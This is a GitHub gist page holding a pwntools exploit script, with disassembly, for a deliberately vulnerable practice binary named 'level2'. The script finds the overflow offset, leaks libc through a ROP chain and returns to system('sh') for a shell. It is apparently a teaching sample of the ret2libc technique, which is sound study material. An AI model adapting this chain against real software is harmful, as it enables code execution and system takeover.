Skip to content

Instantly share code, notes, and snippets.

@zachriggle zachriggle/win.py
Created Jun 17, 2016

Embed
What would you like to do?
from pwn import *
# Here's the disassembly for everything
"""
0804844b <vulnerable_function>:
804844b: 55 push ebp
804844c: 89 e5 mov ebp,esp
804844e: 81 ec 88 00 00 00 sub esp,0x88
8048454: 83 ec 04 sub esp,0x4
8048457: 68 00 01 00 00 push 0x100
804845c: 8d 85 78 ff ff ff lea eax,[ebp-0x88]
8048462: 50 push eax
8048463: 6a 00 push 0x0
8048465: e8 a6 fe ff ff call 8048310 <read@plt>
804846a: 83 c4 10 add esp,0x10
804846d: c9 leave
804846e: c3 ret
0804846f <main>:
804846f: 8d 4c 24 04 lea ecx,[esp+0x4]
8048473: 83 e4 f0 and esp,0xfffffff0
8048476: ff 71 fc push DWORD PTR [ecx-0x4]
8048479: 55 push ebp
804847a: 89 e5 mov ebp,esp
804847c: 51 push ecx
804847d: 83 ec 04 sub esp,0x4
8048480: e8 c6 ff ff ff call 804844b <vulnerable_function>
8048485: 83 ec 04 sub esp,0x4
8048488: 6a 0d push 0xd
804848a: 68 30 85 04 08 push 0x8048530
804848f: 6a 01 push 0x1
8048491: e8 aa fe ff ff call 8048340 <write@plt>
8048496: 83 c4 10 add esp,0x10
8048499: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4]
804849c: c9 leave
804849d: 8d 61 fc lea esp,[ecx-0x4]
80484a0: c3 ret
"""
# Load the ELF from disk so we can grab libc
elf = ELF('./level2')
libc = elf.libc
# Determine where stack control is by forcing a core dump.
io = process('./level2')
io.sendline(cyclic(1024))
io.recvall()
core = Core('core')
eip = cyclic_find(core.eip)
log.info("EIP control @ %i" % eip)
# Actually exploit the process this time
io = process('./level2')
# Create a ROP stack to dump the GOT and return to main()
# so we can exploit again.
rop = ROP(elf)
rop.write(1, elf.got['read'], 4)
rop.main()
print rop.dump()
io.send(fit({
eip: str(rop)
}))
# Get the address of 'read'
read = io.unpack()
# Adjust libc against that offset
libc.address = read - libc.symbols['read']
# Get the address of system(), and build our new ROP stack.
system = libc.symbols['system']
binsh = libc.search('sh\x00').next()
rop = ROP(libc)
rop.system(binsh)
# Send the second ROP which gets us a shell.
io.send(fit({
eip: str(rop)
}))
io.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.